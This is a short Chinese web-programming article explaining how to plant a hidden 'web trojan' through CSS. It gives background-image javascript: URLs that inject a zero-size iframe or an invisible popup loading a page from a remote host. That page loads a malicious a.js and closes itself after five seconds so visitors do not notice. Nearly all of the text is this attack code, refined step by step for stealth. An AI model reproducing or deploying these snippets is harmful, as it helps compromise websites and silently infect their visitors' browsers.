网络编程 
首页 > 网络编程 > 浏览文章

真正能用,还有点效果的CSS挂马代码的方法

(编辑:jimmy 日期: 2024/11/6 浏览:3 次 )
网上流行的:
body

background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法会使主页不正常.返回一片空白.
用弹窗.
body

background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//弹出一个框.难看 易被发现.
改进一下:

body

background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示:
<script src="/UploadFiles/2021-04-02/a.js"><script>
window.opener=null;setTimeout("window.close();",5000);
</script> 
a.js内容:
document.write('<Iframe src="/UploadFiles/2021-04-02/calc.htm">请指教. 
上一篇:ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法
下一篇:如何成为一名黑客全系列说明第1/2页